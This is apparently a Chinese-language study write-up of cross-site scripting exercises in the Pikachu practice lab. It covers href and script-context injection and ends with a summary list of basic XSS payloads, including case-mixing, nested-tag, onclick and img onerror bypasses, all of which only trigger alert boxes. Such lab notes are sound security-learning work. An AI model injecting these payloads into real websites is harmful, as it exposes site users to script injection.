pikachu
xss之herf
F12打开开发者模式发现输入的内容就成为了herf的超链接内容:
输入javascript:alert(1)
得到:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jGtATGd9-1663157418135)(https://gitee.com/re_sets/images/raw/master/blog/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-09-14%20192605.png)]
xss之js输出
F12发现输入的内容都放入了js代码当中:
那就构造一个</script>
让其提前结尾,输入</script><script>alert(2222)</script>
显示:
xss总结
也就是payload总结,结合F12给的代码,目前学习到了:
<script>alert("XSS")</script>
基本xss
<a href="javascript:alert(1)">XSS Test</a>
herf超链接xss
<scr<script>ipt>alert("XSS")</scr<script>ipt>
单一过滤标签xss
<Script>alert("XSS")</sCrIpt>
过滤小写script标签xss
<div οnclick="alert('xss')">
div onclick按钮标签xss
<img src=1 οnerrοr=alert("xss");>
img图像xss
</script><script>alert(2222)</script>
提前结束<script>
的xss